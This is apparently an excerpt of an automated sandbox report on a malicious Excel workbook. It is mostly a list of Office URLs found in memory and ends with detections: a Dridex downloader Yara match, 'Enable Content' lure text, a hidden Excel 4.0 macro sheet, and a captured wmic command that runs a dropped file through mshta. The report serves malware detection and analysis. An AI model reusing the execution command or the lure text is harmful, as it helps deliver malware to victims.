      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com%6
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWriteNH
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/init&S
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com34
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com;2
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comC6
      Source: EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comP
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.coml
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comp7h
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comt6
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comy7g
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000003.296469303.0000000012F74000.00000004.00000001.sdmpString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearer
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://tasks.office.com
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://tasks.office.coms
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.htmlN
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: EXCEL.EXE, 00000000.00000002.584874541.0000000012D80000.00000004.00000001.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.htmlk
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devicesVh8
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: EXCEL.EXE, 00000000.00000002.585020174.0000000012E33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302096885.0000000012E63000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303026768.0000000012E63000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://webshell.suite.office.comM
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmpString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosAZ
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://wus2.contentsync.
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: EXCEL.EXE, 00000000.00000002.584971082.0000000012DDB000.00000004.00000001.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2:R)
      Source: EXCEL.EXE, 00000000.00000003.308062785.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.296561400.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.422536045.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.500931517.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.302328658.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.300890831.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.388696001.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.585288108.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.303312818.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.390323860.0000000012FBB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453271891.0000000012FBB000.00000004.00000001.sdmp, 01ADB2EA-F935-4368-BB11-72A62EB71B1F.0.drString found in binary or memory: https://www.odwebp.svc.ms

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\KBjfhfmoGRoN.rtf, type: DROPPED

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING FROM YELLOW BAR ABOVE Once you have clicked, please click "Enable Content" H I J K
      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED Open this document with Desktop Version of Microsoft Office Excel. CLICK ENA
      Source: Screenshot number: 4Screenshot OCR: Enable Content" H I J K L , M , N , O , P i Q i R i S ^ This document was created in a previous
      Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING FROM YELLOW BARABOVE Once you have clicked, please click "Enable Content" H I J K L
      Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED Open this document with Desktop Version of Microsoft Office Excel. CLICK ENA
      Source: Screenshot number: 8Screenshot OCR: Enable Content" H I J K L , M , N , O , P Q R S ^ Macro Error 7 T [Complaint details 143595.xI
      Source: Screenshot number: 12Screenshot OCR: ENABLE EDITING FROM YELLOW BAR ABOVE Once you have clicked, please click "Enable Content" H J K L
      Source: Screenshot number: 12Screenshot OCR: DOCUMENT IS PROTECTED Open this document with Desktop Version of Microsoft Office Excel. CLICK ENA
      Source: Screenshot number: 12Screenshot OCR: Enable Content" H J K L , M , N , O , P Q R S ^ Macro Error ? X T _ [Complaint details 143595,
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: Complaint details 143595.xlsbInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: Complaint details 143595.xlsbInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: EXCEL.EXE, 00000000.00000002.573418120.0000000000A45000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\KBjfhfmoGRoN.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\DefaultALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=4OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files 